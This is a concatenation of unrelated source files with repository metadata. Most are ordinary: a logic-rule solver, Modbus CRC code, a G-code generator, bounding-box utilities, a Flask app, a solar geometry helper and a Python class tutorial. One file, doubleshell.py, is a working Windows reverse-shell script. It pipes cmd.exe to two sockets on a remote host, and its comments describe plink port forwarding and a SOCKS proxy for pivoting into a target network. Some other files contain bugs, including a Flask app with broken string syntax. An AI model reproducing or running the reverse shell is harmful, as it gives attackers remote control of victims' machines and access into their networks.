# assoc_map = {'+': 'left', '-': 'left', '*': 'left', '/': 'left', '%': 'left',
# '^': 'right', '=': 'right', '**': 'left', '?': 'left'}
def __init__(self, op):
self.op = op
self.name = op
self.n_operands = 2 if op != '!' else 1
self.precedence = self.precedence_map[op]
def eval(self, l, r=None, **kwargs):
if type(l) is Fact:
l = l.value
if type(r) is Fact:
r = r.value
if self.op == '+':
return l & r
elif self.op == '!':
return not l
elif self.op == '|':
return r | l
elif self.op == '^':
return r ^ l
return r
def __repr__(self):
return self.op
def expand_tokens(tokens):
exp = []
n = len(tokens)
i = 0
while i < n:
tk = tokens[i]
if tk in '()':
exp.append(tk)
elif tk in '!+|^':
exp.append(Operator(tk))
elif tk == '<':
if i < n - 2 and tokens[i+1] == '=' and tokens[i+2] == '>':
exp.append(Operator('<=>'))
i += 2
else:
raise ValueError(f"Invalid token: {tk}")
elif tk == '=':
if i < n - 1 and tokens[i+1] == '>':
exp.append(Operator('=>'))
i += 1
else:
exp.append(Operator('='))
elif tk in string.ascii_uppercase:
exp.append(Fact(tk))
else:
raise ValueError(f'Invalid token: {tk}')
i += 1
return exp
def infix_to_rpn(expr):
operators = [] # Stack
output = [] # Queue
# print("INFIX TO RPN")
while expr:
tk = expr.pop(0)
# print(f'tk={tk}, type={type(tk)}')
if type(tk) is Fact:
output.append(tk)
elif type(tk) is Operator:
while True:
if len(operators) == 0:
break
head = operators[-1]
if head == '(':
break
elif type(head) is Operator and head.precedence >= tk.precedence:
output.append(operators.pop())
else:
break
operators.append(tk)
elif tk == '(':
operators.append(tk)
elif tk == ')':
found_bracket = False
while True:
if len(operators) == 0:
break
head = operators[-1]
if head == '(':
found_bracket = True
break
output.append(operators.pop())
if not found_bracket:
raise ValueError("Mismatched parentheses")
assert operators[-1] == '('
operators.pop()
while operators:
op = operators.pop()
if op in ['(', ')']:
raise ValueError("Mismatched parentheses")
output.append(op)
return output
def evaluate_rpn(rpn, facts, rules, verbose=False):
eval_stack = []
while rpn:
val = rpn.pop(0)
if type(val) is Fact:
res = resolve_query(rules, facts, val, verbose=verbose)
if res is None:
val.value = False
else:
val = res
eval_stack.append(val)
elif type(val) is Operator:
n_op = val.n_operands
if not eval_stack:
raise ValueError(f"Not enough operands to perform calculation | Operator {val} ({type(val)})")
op = eval_stack.pop()
# op = resolve_query(rules, facts, op, verbose=True)
if n_op == 1:
r = val.eval(op)
eval_stack.append(r)
else:
if not eval_stack:
raise ValueError(f"Not enough operands to perform calculation | Operator {val}, op1 {op}")
else:
op2 = eval_stack.pop()
# op2 = resolve_query(rules, facts, op2, verbose=True)
eval_stack.append(val.eval(op, op2))
else:
raise NotImplementedError(val, type(val))
if len(eval_stack) != 1:
raise ValueError("Expression doesn't evaluate to a single value")
# print("EVAL STACK:", eval_stack)
res = eval_stack[0]
if type(res) is bool:
return res
elif type(res) is Fact:
return res.value
return res
def evaluate(inp, verbose=False, return_rpn=False):
tokens = ''.join(c for c in inp.split(" ") if c)
if verbose:
print("TOKENS:", tokens)
exp = expand_tokens(tokens)
if verbose:
print("EXPANDED:", exp)
rpn = infix_to_rpn(exp)
if verbose:
print("RPN:", rpn)
if return_rpn:
return rpn
res = evaluate_rpn(rpn, env)
if verbose:
print("EVAL RESULT:", res)
return res
def parse_file(f):
lines = []
for line in f:
if line.endswith("\n"):
line = line[:-1]
if line.startswith("#"):
continue
elif not line:
continue
tokens = [c for c in line.split(" ") if c]
if len(tokens) == 0:
continue
full = True
for i in range(len(tokens)):
if tokens[i].startswith("#"):
full = False
r = " ".join(tokens[:i])
if r:
lines.append(r)
break
if full:
lines.append(" ".join(tokens))
return lines
def parse_rule(rule, facts):
tokens = ''.join(c for c in rule.split(" ") if c)
exp = expand_tokens(tokens)
lhs, consequence, rhs = [], None, []
is_lhs = True
for t in exp:
if type(t) is Fact:
if t.name in facts:
t = facts[t.name]
else:
facts[t.name] = t
if not is_lhs:
t.atomic = False
if type(t) is str and t in ['=>', '<=>']:
consequence = t
is_lhs = False
elif type(t) is not str and t.name in ['=>', '<=>']:
consequence = t
is_lhs = False
elif is_lhs:
lhs.append(t)
else:
rhs.append(t)
if len(lhs) == 0:
raise ValueError(f"{rule}: Empty LHS")
elif len(rhs) == 0:
raise ValueError(f"{rule}: Empty RHS")
elif consequence is None:
raise ValueError(f"{rule}: Consequence is not understood")
return lhs, consequence, rhs
def validate_input(lines):
if len(lines) < 2:
raise ValueError("Input is insufficient for proper working")
rules, init_facts, query = lines[:-2], lines[-2], lines[-1]
if not query.startswith("?") or not all(c in string.ascii_uppercase for c in query[1:]):
raise ValueError("Invalid query:", query)
else:
query = query[1:]
if not init_facts.startswith("=") or not all(c in string.ascii_uppercase for c in init_facts[1:]):
raise ValueError("Invalid initial facts:", init_facts)
else:
init_facts = init_facts[1:]
facts = dict() # List of all known facts, either atomic or complex
rules_parsed = []
for rule in rules:
rules_parsed.append(parse_rule(rule, facts))
return rules_parsed, init_facts, facts, query
def initialize_facts(init_facts, facts):
# Resetting facts (I need this for interactive evaluation)
for f in facts.values():
if f.atomic:
f.value = None
for f in init_facts:
if f not in facts:
print(f"Initial fact {f} doesn't exist in graph")
continue
else:
fact = facts[f]
if not fact.atomic:
fact.atomic = True
fact.value = True
for f in facts.values():
if f.atomic and f.value is None:
f.value = False
def solve_rhs(facts, rhs, res, query, verbose=False):
if verbose:
print("RHS:", rhs, "as:", res)
if res is None:
return res
elif len(rhs) == 1:
t = rhs[0]
if type(t) is Fact:
return res
elif len(rhs) == 2:
op, val = rhs
if op.name == '!':
return not res
else:
raise ValueError("Invalid RHS:", rhs)
elif len(rhs) == 3:
a, op, b = rhs
second = b if f == a else b
if op.name == '+':
if res is True:
return True
else:
if second is False:
return True
else:
return None
else:
raise ValueError("Invalid RHS:", rhs)
def resolve_query(rules, facts, f, verbose=False, stack=[]):
if f in stack:
return None
else:
stack.append(f)
result = None
if verbose:
print("Resolving query:", f)
if type(f) is bool:
return f
if f.atomic:
result = f.value
else:
# Resolving among complex
rules_with_rhs = [r for r in rules if f in r[2]]
if verbose:
print("RULES WITH RHS:", rules_with_rhs)
for r in rules_with_rhs:
lhs, cons, rhs = r[0][:], r[1], r[2][:]
if f in lhs:
print("Recursion attempted")
continue
rpn = infix_to_rpn(lhs)
if verbose:
print("RPN:", rpn)
evaluated_lhs = evaluate_rpn(rpn, facts, rules)
if verbose:
print("LHS EVAL:", evaluated_lhs, "is None:", evaluated_lhs is None)
if evaluated_lhs is None:
if verbose:
print("Continued")
continue
elif cons.name == '=>':
if verbose:
print("Resolving implication")
if evaluated_lhs is True:
result = solve_rhs(facts, rhs, True, f, verbose=verbose)
else:
if verbose:
print("Proposition is False, moving on")
continue
elif cons.name == '<=>':
if verbose:
print("Resolving equivalence")
result = solve_rhs(facts, rhs, evaluated_lhs, f, verbose=verbose)
else:
raise ValueError("Invalid consequence operator", cons)
stack.pop()
return result
def resolve_queries(rules, facts, queries, args):
for q in queries:
if q not in facts:
print(f"Query is not understood: {q}")
continue
f = facts[q]
res = resolve_query(rules, facts, f, args.verbose)
if res is None:
res = False
print(f"Q[{q}]: {res}")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--interactive', '-i', default=False, action='store_true', help='interactive mode')
parser.add_argument('--file', '-f', default=None, help='File to read')
parser.add_argument('--natural', '-n', default=True, action='store_true', help='more natural input')
parser.add_argument('--verbose', '-v', default=False, action='store_true', help='more verbose evaluation')
parser.add_argument('--strict', '-s', default=False, action='store_true', help='Be strict when ambiguous (None->False converter)')
args = parser.parse_args()
env = []
if args.interactive:
rules, init_facts, facts, queries = [], "", dict(), ""
while True:
inp = input("> ")
if args.natural:
inp = inp.upper()
if inp.lower() == 'q' or inp.lower() == 'quit':
break
elif inp.lower() == 'facts':
print(facts)
continue
elif inp.lower() == 'rules':
print(rules)
continue
elif inp.lower() == 'exec':
if args.verbose:
print(f"QUERIES NOW: |{queries}| | RULES: {rules}")
initialize_facts(init_facts, facts)
resolve_queries(rules, facts, queries, args)
else:
try:
if not inp:
continue
if inp.startswith("="):
init_facts = inp[1:]
elif inp.startswith("?"):
queries = inp[1:].strip()
else:
rules.append(parse_rule(inp, facts))
except ValueError as e:
print(e)
else:
if args.file is not None:
try:
f = open(args.file)
except ValueError:
print("No such file. Nice try")
exit(1)
else:
f = sys.stdin
try:
proper_input = parse_file(f)
# print("PROP INPUT:")
rules, init_facts, facts, queries = validate_input(proper_input)
initialize_facts(init_facts, facts)
if args.verbose:
print("RULES", rules)
print("INIT FACTS:", init_facts)
print("FACTS:", facts)
print("QUERIES:", queries)
resolve_queries(rules, facts, queries, args)
except ValueError as e:
print(e)
exit(1)
| true
|
97b58a9e05c619791170611b744ffc47de502e5f
|
Python
|
lg0killer/goodwe
|
/goodwe/modbus.py
|
UTF-8
| 2,913
| 2.84375
| 3
|
[
"MIT"
] |
permissive
|
import logging
from typing import Union
logger = logging.getLogger(__name__)
MODBUS_READ_CMD: int = 0x3
MODBUS_WRITE_CMD: int = 0x6
MODBUS_WRITE_MULTI_CMD: int = 0x10
def _create_crc16_table() -> tuple:
"""Construct (modbus) CRC-16 table"""
table = []
for i in range(256):
buffer = i << 1
crc = 0
for _ in range(8, 0, -1):
buffer >>= 1
if (buffer ^ crc) & 0x0001:
crc = (crc >> 1) ^ 0xA001
else:
crc >>= 1
table.append(crc)
return tuple(table)
_CRC_16_TABLE = _create_crc16_table()
def _modbus_checksum(data: Union[bytearray, bytes]) -> int:
"""
Calculate modbus crc-16 checksum
"""
crc = 0xFFFF
for ch in data:
crc = (crc >> 8) ^ _CRC_16_TABLE[(crc ^ ch) & 0xFF]
return crc
def create_modbus_request(comm_addr: int, cmd: int, offset: int, value: int) -> bytes:
"""
Create modbus request.
data[0] is inverter address
data[1] is modbus command
data[2:3] is command offset parameter
data[4:5] is command value parameter
data[6:7] is crc-16 checksum
"""
data: bytearray = bytearray(6)
data[0] = comm_addr
data[1] = cmd
data[2] = (offset >> 8) & 0xFF
data[3] = offset & 0xFF
data[4] = (value >> 8) & 0xFF
data[5] = value & 0xFF
checksum = _modbus_checksum(data)
data.append(checksum & 0xFF)
data.append((checksum >> 8) & 0xFF)
return bytes(data)
def validate_modbus_response(data: bytes, cmd: int, offset: int, value: int) -> bool:
"""
Validate the modbus response.
data[0:1] is header
data[2] is source address
data[3] is command return type
data[4] is response payload length (for read commands)
data[-2:] is crc-16 checksum
"""
if len(data) <= 4:
logger.debug(f'Response is too short.')
return False
if data[3] != cmd:
logger.debug(f'Response returned command failure: {data[3]}, expected {cmd}.')
return False
if data[3] == MODBUS_READ_CMD:
if data[4] != value * 2:
logger.debug(f'Response has unexpected length: {data[4]}, expected {value * 2}.')
return False
expected_length = data[4] + 7
if len(data) < expected_length:
logger.debug(f'Response is too short: {len(data)}, expected {expected_length}.')
return False
elif data[3] == MODBUS_WRITE_CMD:
if len(data) < 10:
logger.debug(f'Response has unexpected length: {len(data)}, expected {10}.')
return False
expected_length = 10
else:
expected_length = len(data)
checksum_offset = expected_length - 2
if _modbus_checksum(data[2:checksum_offset]) != ((data[checksum_offset + 1] << 8) + data[checksum_offset]):
logger.debug(f'Response CRC-16 checksum does not match.')
return False
return True
| true
|
d3f32a9b72e8e742a8e69e553e72a7622250981f
|
Python
|
ademuri/x-carve-tools
|
/spoilboard/generate_grid.py
|
UTF-8
| 1,592
| 2.640625
| 3
|
[] |
no_license
|
f = open("grid.nc", "w")
width = 700
height = 700
grid_spacing = 10
major_label_spacing = 50
tick_height = 5
offset_x = 14
offset_y = 18
feed_rate = 1500
z_high = 5
z_low = 0
f.write("; Y lines\n")
forward = True
for x in range(offset_x, width + offset_x + grid_spacing, grid_spacing):
f.write(f"G00 Z{z_high}\n")
y_start = offset_y
feed = feed_rate
if (x - offset_x) % major_label_spacing == 0:
y_start = y_start - tick_height
feed = feed_rate * 0.3
if forward:
f.write(f"G00 X{x} Y{y_start}\n")
f.write(f"G01 Z{z_low} F{feed_rate}\n")
f.write(f"G01 X{x} Y{offset_y + height} F{feed}\n")
else:
f.write(f"G00 X{x} Y{offset_y + height}\n")
f.write(f"G01 Z{z_low} F{feed_rate}\n")
f.write(f"G01 X{x} Y{y_start} F{feed}\n")
f.write(f"G00 Z{z_high}\n")
f.write("\n")
forward = not forward
f.write("\n; X lines\n")
for y in range(offset_y, height + offset_y + grid_spacing, grid_spacing):
f.write(f"G00 Z{z_high}\n")
x_start = offset_x
feed = feed_rate
if (y - offset_y) % major_label_spacing == 0:
x_start = x_start - tick_height
feed = feed_rate * 0.3
if forward:
f.write(f"G00 X{x_start} Y{y}\n")
f.write(f"G01 Z{z_low} F{feed}\n")
f.write(f"G01 X{offset_x + width} Y{y} F{feed}\n")
else:
f.write(f"G00 X{offset_x + width} Y{y}\n")
f.write(f"G01 Z{z_low} F{feed_rate}\n")
f.write(f"G01 X{x_start} Y{y} F{feed}\n")
f.write(f"G00 Z{z_high}\n")
f.write("\n")
forward = not forward
f.close()
| true
|
9d8e2da75dd78c206151ef561721026117fe4e33
|
Python
|
Cloudxtreme/dssaas
|
/dss-side-scripts/gen_zipf_dist_jmeter.py
|
UTF-8
| 573
| 2.6875
| 3
|
[
"Apache-2.0"
] |
permissive
|
import numpy as np
import os
from subprocess import call
maxfilename = 200
maxnumfiles = 200 # num files tbc
param = 1.1
s = np.random.zipf(param, maxnumfiles*3)
call(["touch", "filenames.txt"])
f = open('filenames.txt', 'w')
created = 0
i=0
while created < maxnumfiles:
if (int(s[i])<=maxfilename):
f.write(str(s[i])+"\n")
created = created + 1
if (i % 10 == 0):
print "Working: " +str(int((float(created)/float(maxnumfiles))*100.0)) + "% completed"
i = i + 1
print "done"
f.close()
| true
|
de4b31c35f5536edc86abffde6a305cecd7597a8
|
Python
|
paulyyi/Scripts
|
/doubleshell.py
|
UTF-8
| 1,686
| 2.71875
| 3
|
[] |
no_license
|
#creates 2 shells on target
#one is used to setup a remore port forward using plink, which will kill the shell
#the other can be used to setup a socks proxy with powershell, to pivot into target network
import os,socket,subprocess,threading;
def ss2pp(ss, pp):
while True:
data = ss.recv(1024)
if len(data) > 0:
pp.stdin.write(data)
def pp2ss(ss, pp):
while True:
ss.send(pp.stdout.read(1))
ss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
ss.connect(("10.0.0.0",60000))
pp=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
ss2pp_thread = threading.Thread(target=ss2pp, args=[ss, pp])
ss2pp_thread.daemon = True
ss2pp_thread.start()
pp2ss_thread = threading.Thread(target=pp2ss, args=[ss, pp])
pp2ss_thread.daemon = True
pp2ss_thread.start()
def s2p(s, p):
while True:
data = s.recv(1024)
if len(data) > 0:
p.stdin.write(data)
def p2s(s, p):
while True:
s.send(p.stdout.read(1))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.0.0.0",60001))
p=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()
p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()
try:
p.wait()
pp.wait()
except KeyboardInterrupt:
s.close()
ss.close()
| true
|
f85cbd4b1f640f4ae5c2e24188d42a4116784a33
|
Python
|
chuckma/pythondemo
|
/collections/chaper2/tuple_test.py
|
UTF-8
| 520
| 3.578125
| 4
|
[] |
no_license
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 11:27
# @Author : Administrator
# @Site :
# @File : tuple_test
# @Software: PyCharm
name_tuple = ("boy1", "boy2")
# tuple 拆包
user_tuple = ("bobb1", 24, 170, "杭州",)
# name, age, height = user_tuple
name, *other = user_tuple
print(name, other)
# tuple 的不可变性不是绝对的
# tuple 最好不要放可变的数据对象,下面的这个数组就是可变的
name_tuple = ("boy2", [2,3],)
name_tuple[1].append(4)
print(name_tuple)
| true
|
f083b2cb4d97d19387a4984eb8e95e3eea2d61f2
|
Python
|
patrickhop/tc
|
/enlitic_1.py
|
UTF-8
| 1,304
| 3
| 3
|
[] |
no_license
|
# find min-subsequence of length two s.t elements of subsequence are non-adjacent
# endpoints aren't of interest. we can safely exclude them from sequence, and base-case computation
# n = 1 (no sol: no subsequence of length two)
# n = 2 (no sol: elements of subsequence must be adjacent)
# n = 3 (sol : opt = [(A_0, 0), (A_2, 2)]) => Base Case... sol contains all data need to compute optimality
# n = n + 1 (sol: produce new-subsequence that is optimal for n + 1
def solution(A):
A = A[1:-1] # endpoints are not of interest to us
opt = [(A[0], 0), (A[2], 2)] # Base case
for i in xrange(3, len(A)):
if A[i] < opt[0][0] and A[i] < opt[1][0]:
if i + 1 != opt[1][1]:
# not adj
if opt[0][0] >= opt[1][0]:
opt[0] = opt[1]
opt[1] = (A[i], i)
else:
opt[1] = (A[i], i)
else:
# is adj
opt[1] = (A[i], i)
elif A[i] < opt[1][0]:
# adjacency doesn't matter
opt[1] = (A[i], i)
elif A[i] < opt[0][0] and (i + 1 != opt[1][1]):
# if it's adjacent, we can't replace first element
opt[0] = opt[1]
opt[1] = (A[i], i)
return opt[0][0] + opt[1][0]
| true
|
3788accd6569f334e6db1621347bb236292f6227
|
Python
|
CatarauCorina/creativai
|
/finetune_fasterrcnn/utils.py
|
UTF-8
| 6,780
| 2.96875
| 3
|
[] |
no_license
|
import torch
def non_max_suppression(prediction, num_classes, conf_thres=0.5, nms_thres=0.4):
"""
Removes detections with lower object confidence score than 'conf_thres' and performs
Non-Maximum Suppression to further filter detections.
Returns detections with shape:
(x1, y1, x2, y2, object_conf, class_score, class_pred)
"""
# From (center x, center y, width, height) to (x1, y1, x2, y2)
box_corner = prediction.new(prediction.shape)
box_corner[:, :, 0] = prediction[:, :, 0] - prediction[:, :, 2] / 2
box_corner[:, :, 1] = prediction[:, :, 1] - prediction[:, :, 3] / 2
box_corner[:, :, 2] = prediction[:, :, 0] + prediction[:, :, 2] / 2
box_corner[:, :, 3] = prediction[:, :, 1] + prediction[:, :, 3] / 2
prediction[:, :, :4] = box_corner[:, :, :4]
output = [None for _ in range(len(prediction))]
for image_i, image_pred in enumerate(prediction):
# Filter out confidence scores below threshold
conf_mask = (image_pred[:, 4] >= conf_thres).squeeze()
image_pred = image_pred[conf_mask]
# If none are remaining => process next image
if not image_pred.size(0):
continue
# Get score and class with highest confidence
class_conf, class_pred = torch.max(image_pred[:, 5 : 5 + num_classes], 1, keepdim=True)
# Detections ordered as (x1, y1, x2, y2, obj_conf, class_conf, class_pred)
detections = torch.cat((image_pred[:, :5], class_conf.float(), class_pred.float()), 1)
# Iterate through all predicted classes
unique_labels = detections[:, -1].cpu().unique()
if prediction.is_cuda:
unique_labels = unique_labels.cuda()
for c in unique_labels:
# Get the detections with the particular class
detections_class = detections[detections[:, -1] == c]
# Sort the detections by maximum objectness confidence
_, conf_sort_index = torch.sort(detections_class[:, 4], descending=True)
detections_class = detections_class[conf_sort_index]
# Perform non-maximum suppression
max_detections = []
while detections_class.size(0):
# Get detection with highest confidence and save as max detection
max_detections.append(detections_class[0].unsqueeze(0))
# Stop if we're at the last detection
if len(detections_class) == 1:
break
# Get the IOUs for all boxes with lower confidence
ious = bbox_iou(max_detections[-1], detections_class[1:])
# Remove detections with IoU >= NMS threshold
detections_class = detections_class[1:][ious < nms_thres]
max_detections = torch.cat(max_detections).data
# Add max detections to outputs
output[image_i] = (
max_detections if output[image_i] is None else torch.cat((output[image_i], max_detections))
)
return output
def bbox_iou(box1, box2, x1y1x2y2=True):
"""
Returns the IoU of two bounding boxes
"""
if not x1y1x2y2:
# Transform from center and width to exact coordinates
b1_x1, b1_x2 = box1[:, 0] - box1[:, 2] / 2, box1[:, 0] + box1[:, 2] / 2
b1_y1, b1_y2 = box1[:, 1] - box1[:, 3] / 2, box1[:, 1] + box1[:, 3] / 2
b2_x1, b2_x2 = box2[:, 0] - box2[:, 2] / 2, box2[:, 0] + box2[:, 2] / 2
b2_y1, b2_y2 = box2[:, 1] - box2[:, 3] / 2, box2[:, 1] + box2[:, 3] / 2
else:
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[:, 0], box1[:, 1], box1[:, 2], box1[:, 3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[:, 0], box2[:, 1], box2[:, 2], box2[:, 3]
# get the corrdinates of the intersection rectangle
inter_rect_x1 = torch.max(b1_x1, b2_x1)
inter_rect_y1 = torch.max(b1_y1, b2_y1)
inter_rect_x2 = torch.min(b1_x2, b2_x2)
inter_rect_y2 = torch.min(b1_y2, b2_y2)
# Intersection area
inter_area = torch.clamp(inter_rect_x2 - inter_rect_x1 + 1, min=0) * torch.clamp(
inter_rect_y2 - inter_rect_y1 + 1, min=0
)
# Union Area
b1_area = (b1_x2 - b1_x1 + 1) * (b1_y2 - b1_y1 + 1)
b2_area = (b2_x2 - b2_x1 + 1) * (b2_y2 - b2_y1 + 1)
iou = inter_area / (b1_area + b2_area - inter_area + 1e-16)
return iou
def nms(boxes, scores, overlap=0.5, top_k=200):
"""Apply non-maximum suppression at test time to avoid detecting too many
overlapping bounding boxes for a given object.
Args:
boxes: (tensor) The location preds for the img, Shape: [num_priors,4].
scores: (tensor) The class predscores for the img, Shape:[num_priors].
overlap: (float) The overlap thresh for suppressing unnecessary boxes.
top_k: (int) The Maximum number of box preds to consider.
Return:
The indices of the kept boxes with respect to num_priors.
"""
keep = scores.new(scores.size(0)).zero_().long()
if boxes.numel() == 0:
return keep
x1 = boxes[:, 0]
y1 = boxes[:, 1]
x2 = boxes[:, 2]
y2 = boxes[:, 3]
area = torch.mul(x2 - x1, y2 - y1)
v, idx = scores.sort(0) # sort in ascending order
# I = I[v >= 0.01]
idx = idx[-top_k:] # indices of the top-k largest vals
xx1 = boxes.new()
yy1 = boxes.new()
xx2 = boxes.new()
yy2 = boxes.new()
w = boxes.new()
h = boxes.new()
# keep = torch.Tensor()
count = 0
while idx.numel() > 0:
i = idx[-1] # index of current largest val
# keep.append(i)
keep[count] = i
count += 1
if idx.size(0) == 1:
break
idx = idx[:-1] # remove kept element from view
# load bboxes of next highest vals
torch.index_select(x1, 0, idx, out=xx1)
torch.index_select(y1, 0, idx, out=yy1)
torch.index_select(x2, 0, idx, out=xx2)
torch.index_select(y2, 0, idx, out=yy2)
# store element-wise max with next highest score
xx1 = torch.clamp(xx1, min=x1[i])
yy1 = torch.clamp(yy1, min=y1[i])
xx2 = torch.clamp(xx2, max=x2[i])
yy2 = torch.clamp(yy2, max=y2[i])
w.resize_as_(xx2)
h.resize_as_(yy2)
w = xx2 - xx1
h = yy2 - yy1
# check sizes of xx1 and xx2.. after each iteration
w = torch.clamp(w, min=0.0)
h = torch.clamp(h, min=0.0)
inter = w*h
# IoU = i / (area(a) + area(b) - i)
rem_areas = torch.index_select(area, 0, idx) # load remaining areas)
union = (rem_areas - inter) + area[i]
IoU = inter.float()/union.float() # store result in iou
# keep only elements with an IoU <= overlap
idx = idx[IoU.le(overlap)]
return keep, count
| true
|
fcfb3af8cc947cff30931573c8959a73c560248b
|
Python
|
Treinamento-Stefa-IA-DevOps/treinamento-dia-04-08-vitorrangelcs
|
/docker_tutorial/flask_example/app/flask_app.py
|
UTF-8
| 608
| 2.953125
| 3
|
[] |
no_license
|
from flask import Flask
import os
import psycopg2
app = Flask(__name__)
@app.route('/')
def hello_world():
with psycopg2.connect(f"dbname={os.getenv("DB_NAME")} user={"DB_USER"} password:{os.getenv:"DB_PASS"}") as conn:
cur = conn.cursor()
cur.execute("SELECT * FROM test;")
rows = cur.fetchall() # retorna o resultado como tuplas, onde cada item dentro da tupla [e o valor de uma coluna]
message = ''
for row in rows:
message = message + row[1] # seleciona primeiro elemento da tupla retornada
return message + " Direto de meu belo database!!"
| true
|
7a2e6b7d930c42d4015919a49bfeae1d9bed45fe
|
Python
|
jasdeep06/improving_python
|
/importSaga/code/sizeFunction.py
|
UTF-8
| 926
| 3.15625
| 3
|
[] |
no_license
|
import os
import sys
suffixes={1000:["KB","MB","GB","TB"],
1024:["KiB","MiB","GiB","TiB"]}
def approximate_size(filePath,yardstickIs1024=True):
"""
Returns approximate size of the file at file_path
:param filePath:path of the file
:param yardstickIs1024: 1kb=1024 bytes or 1000 bytes
:return: size of the file
"""
if not os.path.exists(filePath):
raise FileExistsError("The file you requested does not exists.")
sizeOfFile=os.path.getsize(filePath)
yardstick = 1024 if yardstickIs1024 else 1000
for suffix in suffixes[yardstick]:
sizeOfFile = sizeOfFile / yardstick
if sizeOfFile > yardstick:
continue
else:
return '{0:.1f} {1}'.format(sizeOfFile,suffix)
#if __name__=="__main__":
# print(approximate_size("/Users/jasdeepsinghchhabra/improving_python/importSaga/dataAndCaller/data/video.mp4",True))
| true
|
292eec2d9faea3e11e5199176f937491d3a0f59c
|
Python
|
BobbyHughes17/Blogz
|
/models.py
|
UTF-8
| 1,119
| 2.734375
| 3
|
[] |
no_license
|
from app import db,app
import hashlib
from datetime import datetime
class User(db.Model):
id = db.Column(db.Integer, primary_key = True)
user_name = db.Column(db.String(120), unique = True,nullable = True)
pw_hash = db.Column(db.String(120),nullable = False)
blogz = db.relationship('Blog',backref='owner')
def __init__(self,user_name,password):
self.user_name = user_name
self.pw_hash = make_pw_hash(password)
class Blog(db.Model):
id = db.Column(db.Integer, primary_key = True)
title = db.Column(db.String(120), nullable = False, unique = True)
body = db.Column(db.Text)
date_created = db.Column(db.DateTime)
owner_id = db.Column(db.Integer,db.ForeignKey('user.id'),nullable = False)
def __init__(self,title,body,owner):
self.title = title
self.body = body
self.date_created = datetime.now()
self.owner = owner
def make_pw_hash(password):
return hashlib.sha256(str.encode(password)).hexdigest()
def check_pw_hash(password,hash):
if make_pw_hash(password) == hash:
return True
return False
| true
|
57e97a41a808f1ee371ca64e84e25b6052c88458
|
Python
|
slacgismo/solar-data-tools
|
/pvsystemprofiler/algorithms/angle_of_incidence/lambda_functions.py
|
UTF-8
| 3,230
| 3.125
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
"""
This module is used to set the hour_angle_equation in terms of the unknowns. The hour equation is a function of the
declination (delta), the hour angle (omega) , latitude (phi), tilt (beta) and azimuth (gamma). The declination and the
hour angle are treated as input parameters for all cases. Latitude, tilt and azimuth can be given as input parameters
or left as unknowns (`None`). In total, seven different combinations arise from having these three parameters
as an inputs or as a unknowns. The seven conditionals below correspond to those combinations. The output function `func`
is used as one of the inputs to run_curve_fit which in turn is used to fit the unknowns. The function other outputs is
the 'bounds' tuple containing the bounds for the variables. Bounds for latitude are -90 to 90. Bounds for tilt are 0 to
90. Bounds for azimuth are -180 to 180. It is noted that, theoretically, bounds for tilt are 0 to 180 (Duffie, John A.,
and William A. Beckman. Solar engineering of thermal processes. New York: Wiley, 1991.). However a value of tilt >90
would mean that that the surface has a downward-facing component, which is not the case of the current application.
"""
from pvsystemprofiler.utilities.angle_of_incidence_function import func_costheta
import numpy as np
def select_function(latitude=None, tilt=None, azimuth=None):
"""
:param latitude: (optional) latitude input value in Degrees.
:param tilt: (optional) Tilt input value in Degrees.
:param azimuth: (optional) Azimuth input value in Degrees.
:return: Customized function 'func' and 'bounds' tuple.
"""
if latitude is None and tilt is None and azimuth is None:
func = lambda x, phi, beta, gamma: func_costheta(x, phi, beta, gamma)
elif latitude is not None and tilt is None and azimuth is None:
func = lambda x, beta, gamma: func_costheta(
x, np.deg2rad(latitude), beta, gamma
)
elif latitude is None and tilt is not None and azimuth is None:
func = lambda x, phi, gamma: func_costheta(x, phi, np.deg2rad(tilt), gamma)
elif latitude is None and tilt is None and azimuth is not None:
func = lambda x, phi, beta: func_costheta(x, phi, beta, np.deg2rad(azimuth))
elif latitude is None and tilt is not None and azimuth is not None:
func = lambda x, phi: func_costheta(
x, phi, np.deg2rad(tilt), np.deg2rad(azimuth)
)
elif latitude is not None and tilt is None and azimuth is not None:
func = lambda x, beta: func_costheta(
x, np.deg2rad(latitude), beta, np.deg2rad(azimuth)
)
elif latitude is not None and tilt is not None and azimuth is None:
func = lambda x, gamma: func_costheta(
x, np.deg2rad(latitude), np.deg2rad(tilt), gamma
)
bounds_dict = {
"latitude": [-np.pi / 2, np.pi / 2],
"tilt": [0, np.pi / 2],
"azimuth": [-np.inf, np.inf],
}
bounds = []
if latitude is None:
bounds.append(bounds_dict["latitude"])
if tilt is None:
bounds.append(bounds_dict["tilt"])
if azimuth is None:
bounds.append(bounds_dict["azimuth"])
bounds = tuple(np.transpose(bounds).tolist())
return func, bounds
| true
|
e50927a2d1fa52442e3abcff85c6df6e81ce3b36
|
Python
|
chasefrankenfeld/how_to_think_like_a_computer_scientist
|
/chapters14_to_16/ch16_classes_digging_deeper.py
|
UTF-8
| 5,382
| 3.84375
| 4
|
[] |
no_license
|
import sys
def test(did_pass):
""" Print the rests of the test """
linenum = sys._getframe(1).f_lineno # gets the callers line number
if did_pass:
msg = "Test at line {} is ok.".format(linenum)
else:
msg = "Test at line {} FAILED.".format(linenum)
print(msg)
class Point:
""" Point class represents and manipulates x, y coordinates. """
def __init__(self, x=0, y=0):
""" Create a new point at x, y. """
self.x = x
self.y = y
def __str__(self):
""" Converting the point to a string. """
return "({0}, {1})".format(self.x, self.y)
def __add__(self, other):
return Point(self.x + other.x, self.y + other.y)
def __mul__(self, other):
return self.x * other.x + self.y * other.y
def __rmul__(self, other):
return Point(other * self.x, other * self.y)
def halfway(self, target):
""" Return the halfway point between myself and the target"""
mx = (self.x + target.x) / 2
my = (self.y + target.y) / 2
return Point(mx, my)
def distance_from_origin(self):
""" Compute m distance from the origin. """
